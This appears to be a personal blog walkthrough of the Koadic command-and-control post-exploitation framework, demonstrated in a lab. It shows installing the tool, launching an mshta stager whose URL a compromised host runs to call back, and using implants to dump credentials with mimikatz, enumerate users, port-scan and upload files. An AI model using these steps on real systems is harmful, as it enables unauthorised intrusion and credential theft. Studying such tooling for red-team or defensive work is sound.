Today I'd like to write about another post-exploit kit, the Koadic C2. While it seems like there are dozens of C2 options out there (including Cobalt Strike), I wanted to investigate Koadic anyway. To get started, we can quickly and easily install via:
git clone https://github.com/zerosum0x0/koadic.git
pip3 install -r requirements.txt
Once we are up and running, we will see this menu:
? will show us the commands we can run:
As you can already see, there is similarities to tools like Empire. It is worth noting that the "victims" are referred to as zombies within this tool. There is also ...taco time?
Ha, I guess it is exactly what it claims to be. Getting serious now, let's get us a zombie!
Step one is to set up a stager. The tool starts you within the stager mshta. According to their video, it is the smallest and most reliable option. So let's type in
info and see what options we need to set.
Easily enough, we just need to set up our callback host and port. For the demo, let's leave that as default. Once those are set, simply run
run to launch the stager. We'll be give a URL which the stager is using to receive zombies. Note that you should not edit this URL.
Now that the stager is running, we switch to our compromised host and use the URL within an mshta command. For the purposes of this demo, we'll have RDP access to the machine. Run
mshta <URL> on the victim machine and you'll see a zombie check in on the attacker machine.
And we are successful!
From here, we can run
zombies to see our list of zombies:
We can also get more detailed information by supplying an ID to the
Now we should interact with our zombie. We can start with
use implant and tab twice to see our options:
The implants are well organized, so we'll just pick
inject to start with.
We can then use
It is kind of neat that there is the option to target ALL zombies. Might make some noise though..
Anyway, all the options look fine, so lets
run. The output is pretty standard for the mimitkatz command:
We should take a look at some of the other implants we can use.
That screenshot is trash, so lets instead dig in to some of the options that stand out.
implant/gather/ we have some valuable information to collect through our zombie. This includes clipboard data, domain info, shares, users, etc. As an example, to collect the users we can run
use implant/gather/enum_users and then
run. Interestingly, the results never showed up on my attacker machine. Instead, the job ran for some time and I noticed that the below window had appeared on my victim machine:
So I still got the information I was looking for, just in a strange way. I'm not sure if this is intended or not. We can also run
use implant/scan/tcp to run a port scan from our zombie. I just left the defaults and targeted another machine in the lab:
implant/util/ we can upload or download a file. I'll create a test file and upload it to the zombie. Similar to the other modules, we just
use the module and run
options to see what info we need to provide. In this case, it is really just
LFILE and the
DIRECTORY options. I selected the Administrator's Desktop. Note that using
\ caused an error while
/ was successful.
Over on the zombie, we can see the file on the Desktop:
That's about it for today. I've shown just how easy Koadic is as a C2 tool. I know there are more advanced features such as injecting straight into memory but I'll save that for another post (maybe). Hopefully this post helps you in some way and as always, thanks for reading!